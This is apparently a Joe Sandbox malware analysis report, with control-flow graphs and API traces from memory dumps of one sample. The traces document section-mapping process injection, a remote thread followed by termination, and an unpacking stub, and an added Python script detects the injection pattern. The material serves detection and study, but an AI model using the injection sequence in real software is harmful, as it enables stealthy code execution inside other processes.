                                                                                                                                        • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                                        • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Control-flow Graph

• Rendered graph not reproduced. Function 4015fb-4019dd: calls sub_40127e at 401634 and 401996; NtDuplicateObject at 4016af-4016c6; NtCreateSection at 4016cc-4016f0 and 40174c-401772; NtMapViewOfSection at 4016f2-401713, 401715-401731, 401782-4017a3 and 4017a9-4017c5; tail call to 4017d0 at 4017cb. Every API block also has an edge to the exit block 401987.
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                                        • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64
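The seven API reference lines listed for this function (NtDuplicateObject, two NtCreateSection calls with SEC_COMMIT, each followed by two NtMapViewOfSection calls) are the section-based injection pattern: a section is created, mapped once into the current process for writing, then mapped again into another process handle, the second one with PAGE_EXECUTE_READWRITE at creation and PAGE_EXECUTE_READ on the remote view. The following Python is an added example, not part of the Joe Sandbox report, that parses such "APIs" lines and flags any section mapped into more than one distinct ProcessHandle value. It assumes the argument order of the documented ntdll prototypes (SectionPageProtection and AllocationAttributes as the 5th and 6th NtCreateSection arguments; ProcessHandle and Win32Protect as the 2nd and 10th NtMapViewOfSection arguments), treats a "?" argument as an unresolved value, and uses the seven lines above as a constructed sample.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constants from the Windows SDK (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80
SEC_COMMIT = 0x08000000

# Argument positions per the documented ntdll prototypes (assumption: the sandbox
# prints arguments in call order):
# NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
#                 SectionPageProtection, AllocationAttributes, FileHandle)
# NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize,
#                    SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect)
CREATE_PROTECT, CREATE_ATTRS = 4, 5
MAP_PROCESS, MAP_PROTECT = 1, 9

# Constructed sample: the seven API reference lines from the report block above, copied verbatim.
SAMPLE_TRACE = """
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed '?' (value not resolved)
    ref: int                   # address of the call site


def parse_trace(text: str) -> List[ApiCall]:
    """Parse Joe Sandbox 'APIs' lines into structured calls; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16) for a in m.group("args").split(",")]
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def find_shared_sections(calls: List[ApiCall]) -> List[dict]:
    """Group each NtCreateSection with the NtMapViewOfSection calls that follow it and report
    sections mapped into more than one distinct ProcessHandle value. That double mapping
    (write through one view, execute through the other) is the section-injection indicator."""
    findings: List[dict] = []
    current = None

    def close(group):
        if group is None:
            return
        handles = {m.args[MAP_PROCESS] for m in group["maps"]}
        if len(handles) < 2:
            return
        create = group["create"]
        prot = create.args[CREATE_PROTECT] or 0
        findings.append({
            "create_ref": create.ref,
            "protect": PAGE_PROTECT.get(prot, hex(prot)),
            "executable": bool(prot & PAGE_EXECUTE_MASK),
            "sec_commit": bool((create.args[CREATE_ATTRS] or 0) & SEC_COMMIT),
            "map_refs": [m.ref for m in group["maps"]],
            "view_protects": [PAGE_PROTECT.get(m.args[MAP_PROTECT], "?") for m in group["maps"]],
        })

    for c in calls:
        if c.api == "NtCreateSection":
            close(current)
            current = {"create": c, "maps": []}
        elif c.api == "NtMapViewOfSection" and current is not None:
            current["maps"].append(c)
    close(current)
    return findings


if __name__ == "__main__":
    for finding in find_shared_sections(parse_trace(SAMPLE_TRACE)):
        print(finding)
```

On the sample trace this reports both sections: the first (PAGE_READWRITE, a plain shared buffer) and the second, which is created PAGE_EXECUTE_READWRITE, mapped PAGE_READWRITE into one handle and PAGE_EXECUTE_READ into another. A legitimate program can also map a section into two processes, so treat the finding as an indicator to pair with the process handle's origin (here the preceding NtDuplicateObject) rather than as proof on its own.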

Control-flow Graph

• Rendered graph not reproduced. Function 401613-4019dd: calls sub_40127e at 401634 and 401996; NtDuplicateObject at 4016af-4016c6; NtCreateSection at 4016cc-4016f0 and 40174c-401772; NtMapViewOfSection at 4016f2-401713, 401715-401731, 401782-4017a3 and 4017a9-4017c5; tail call to 4017d0 at 4017cb. Every API block also has an edge to the exit block 401987.
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                                        • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Control-flow Graph

• Rendered graph not reproduced. Function 401606-4019dd (entry block 401606-401607 self-loops, then 401609): calls sub_40127e at 40163c and 401996; NtDuplicateObject at 4016af-4016c6; NtCreateSection at 4016cc-4016f0 and 40174c-401772; NtMapViewOfSection at 4016f2-401713, 401715-401731, 401782-4017a3 and 4017a9-4017c5; tail call to 4017d0 at 4017cb. Every API block also has an edge to the exit block 401987.
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                        • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                                        • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Control-flow Graph
control_flow_graph 312 401627-40162c 316 401643 312->316 317 401634-401659 call 40127e 312->317 316->317 322 40165b 317->322 323 40165e-401663 317->323 322->323 325 401989-401991 323->325 326 401669-40167a 323->326 325->323 331 401996-4019dd call 40127e 325->331 329 401680-4016a9 326->329 330 401987 326->330 329->330 338 4016af-4016c6 NtDuplicateObject 329->338 330->331 338->330 340 4016cc-4016f0 NtCreateSection 338->340 342 4016f2-401713 NtMapViewOfSection 340->342 343 40174c-401772 NtCreateSection 340->343 342->343 345 401715-401731 NtMapViewOfSection 342->345 343->330 347 401778-40177c 343->347 345->343 348 401733-401749 345->348 347->330 350 401782-4017a3 NtMapViewOfSection 347->350 348->343 350->330 352 4017a9-4017c5 NtMapViewOfSection 350->352 352->330 355 4017cb call 4017d0 352->355
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
• Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
• Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
• Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Control-flow Graph
control_flow_graph 357 401641-401659 call 40127e 364 40165b 357->364 365 40165e-401663 357->365 364->365 367 401989-401991 365->367 368 401669-40167a 365->368 367->365 373 401996-4019dd call 40127e 367->373 371 401680-4016a9 368->371 372 401987 368->372 371->372 380 4016af-4016c6 NtDuplicateObject 371->380 372->373 380->372 382 4016cc-4016f0 NtCreateSection 380->382 384 4016f2-401713 NtMapViewOfSection 382->384 385 40174c-401772 NtCreateSection 382->385 384->385 387 401715-401731 NtMapViewOfSection 384->387 385->372 389 401778-40177c 385->389 387->385 390 401733-401749 387->390 389->372 392 401782-4017a3 NtMapViewOfSection 389->392 390->385 392->372 394 4017a9-4017c5 NtMapViewOfSection 392->394 394->372 397 4017cb call 4017d0 394->397
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
• Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
• Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
• Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Control-flow Graph
control_flow_graph 399 403103-403127 400 403246-40324b 399->400 401 40312d-403145 399->401 401->400 402 40314b-40315c 401->402 403 40315e-403167 402->403 404 40316c-40317a 403->404 404->404 405 40317c-403183 404->405 406 4031a5-4031ac 405->406 407 403185-4031a4 405->407 408 4031ce-4031d1 406->408 409 4031ae-4031cd 406->409 407->406 410 4031d3-4031d6 408->410 411 4031da 408->411 409->408 410->411 412 4031d8 410->412 411->403 413 4031dc-4031e1 411->413 412->413 413->400 414 4031e3-4031e6 413->414 414->400 415 4031e8-403243 RtlCreateUserThread NtTerminateProcess 414->415 415->400
APIs
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
• Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
• Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
• Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Control-flow Graph
control_flow_graph 417 403257-40325f 418 4031f0-403243 RtlCreateUserThread NtTerminateProcess 417->418 419 403261-40327f 417->419 420 403246-40324b 418->420 425 403281 419->425 426 403286-403290 419->426 425->426 427 403283-403285 425->427 428 403292 426->428 429 403298-4032ba call 4012ec 426->429 427->426 428->429 430 403293-403297 428->430 435 4032be 429->435 435->435
APIs
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
• Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
• Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
• Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Control-flow Graph
control_flow_graph 0 5b003c-5b0047 1 5b0049 0->1 2 5b004c-5b0263 call 5b0a3f call 5b0e0f call 5b0d90 VirtualAlloc 0->2 1->2 17 5b028b-5b0292 2->17 18 5b0265-5b0289 call 5b0a69 2->18 20 5b02a1-5b02b0 17->20 22 5b02ce-5b03c2 VirtualProtect call 5b0cce call 5b0ce7 18->22 20->22 23 5b02b2-5b02cc 20->23 29 5b03d1-5b03e0 22->29 23->20 30 5b0439-5b04b8 VirtualFree 29->30 31 5b03e2-5b0437 call 5b0ce7 29->31 32 5b04be-5b04cd 30->32 33 5b05f4-5b05fe 30->33 31->29 36 5b04d3-5b04dd 32->36 37 5b077f-5b0789 33->37 38 5b0604-5b060d 33->38 36->33 40 5b04e3-5b0505 36->40 41 5b078b-5b07a3 37->41 42 5b07a6-5b07b0 37->42 38->37 43 5b0613-5b0637 38->43 51 5b0517-5b0520 40->51 52 5b0507-5b0515 40->52 41->42 44 5b086e-5b08be LoadLibraryA 42->44 45 5b07b6-5b07cb 42->45 46 5b063e-5b0648 43->46 50 5b08c7-5b08f9 44->50 48 5b07d2-5b07d5 45->48 46->37 49 5b064e-5b065a 46->49 53 5b07d7-5b07e0 48->53 54 5b0824-5b0833 48->54 49->37 55 5b0660-5b066a 49->55 56 5b08fb-5b0901 50->56 57 5b0902-5b091d 50->57 58 5b0526-5b0547 51->58 52->58 59 5b07e2 53->59 60 5b07e4-5b0822 53->60 62 5b0839-5b083c 54->62 61 5b067a-5b0689 55->61 56->57 63 5b054d-5b0550 58->63 59->54 60->48 64 5b068f-5b06b2 61->64 65 5b0750-5b077a 61->65 62->44 66 5b083e-5b0847 62->66 68 5b05e0-5b05ef 63->68 69 5b0556-5b056b 63->69 70 5b06ef-5b06fc 64->70 71 5b06b4-5b06ed 64->71 65->46 72 5b084b-5b086c 66->72 73 5b0849 66->73 68->36 76 5b056f-5b057a 69->76 77 5b056d 69->77 74 5b074b 70->74 75 5b06fe-5b0748 70->75 71->70 72->62 73->44 74->61 75->74 80 5b059b-5b05bb 76->80 81 5b057c-5b0599 76->81 77->68 84 5b05bd-5b05db 80->84 81->84 84->63
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
Strings
Memory Dump Source
• Source File: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5b0000_35DB.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14

Control-flow Graph
control_flow_graph 436 783965-78397e 437 783980-783982 436->437 438 783989-783995 CreateToolhelp32Snapshot 437->438 439 783984 437->439 440 7839a5-7839b2 Module32First 438->440 441 783997-78399d 438->441 439->438 442 7839bb-7839c3 440->442 443 7839b4-7839b5 call 783624 440->443 441->440 447 78399f-7839a3 441->447 448 7839ba 443->448 447->437 447->440 448->442
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0078398D
• Module32First.KERNEL32(00000000,00000224), ref: 007839AD
Memory Dump Source
• Source File: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, Offset: 00771000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_771000_35DB.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 85b03b0c8621d4375719d3b5254873c8be134c6e19c2e2b9ac4bb0a6861179dc
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 45F062352407106BE7203ABD988DB6AB6EDAF49B28F100628E692911C0DBB8FD454761

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 449 5b0e0f-5b0e24 SetErrorMode * 2 450 5b0e2b-5b0e2c 449->450 451 5b0e26 449->451 451->450
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
• SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
Memory Dump Source
• Source File: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5b0000_35DB.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

Control-flow Graph
control_flow_graph 452 4019c0-4019c6 453 4019e7-401a10 452->453 454 4019c8-4019dd call 40127e 452->454 462 401a13-401a46 call 40127e Sleep call 4014fb 453->462 463 401a09-401a0c 453->463 471 401a55-401a5b 462->471 472 401a48-401a50 call 4015fb 462->472 463->462 475 401a60-401a65 471->475 476 401a69 471->476 472->471 477 401a6c-401a9a call 40127e 475->477 476->475 476->477
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0

Control-flow Graph
control_flow_graph 486 4019e0-401a10 492 401a13-401a46 call 40127e Sleep call 4014fb 486->492 493 401a09-401a0c 486->493 501 401a55-401a5b 492->501 502 401a48-401a50 call 4015fb 492->502 493->492 505 401a60-401a65 501->505 506 401a69 501->506 502->501 507 401a6c-401a9a call 40127e 505->507 506->505 506->507
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

Control-flow Graph
control_flow_graph 516 4019eb-401a10 520 401a13-401a46 call 40127e Sleep call 4014fb 516->520 521 401a09-401a0c 516->521 529 401a55-401a5b 520->529 530 401a48-401a50 call 4015fb 520->530 521->520 533 401a60-401a65 529->533 534 401a69 529->534 530->529 535 401a6c-401a9a call 40127e 533->535 534->533 534->535
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

Control-flow Graph
control_flow_graph 544 401a04-401a46 call 40127e Sleep call 4014fb 553 401a55-401a5b 544->553 554 401a48-401a50 call 4015fb 544->554 557 401a60-401a65 553->557 558 401a69 553->558 554->553 559 401a6c-401a9a call 40127e 557->559 558->557 558->559
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00783675
Memory Dump Source
• Source File: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, Offset: 00771000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_771000_35DB.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0

APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_35DB.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
